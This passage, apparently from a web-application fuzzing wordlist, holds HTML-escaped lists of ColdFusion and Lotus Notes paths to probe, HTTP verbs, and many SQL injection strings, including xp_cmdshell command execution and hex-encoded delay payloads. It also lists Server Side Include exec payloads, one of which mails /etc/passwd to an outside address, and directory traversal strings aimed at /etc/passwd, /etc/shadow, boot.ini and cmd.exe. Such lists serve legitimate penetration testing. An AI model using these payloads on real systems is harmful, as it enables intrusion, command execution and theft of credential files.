CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
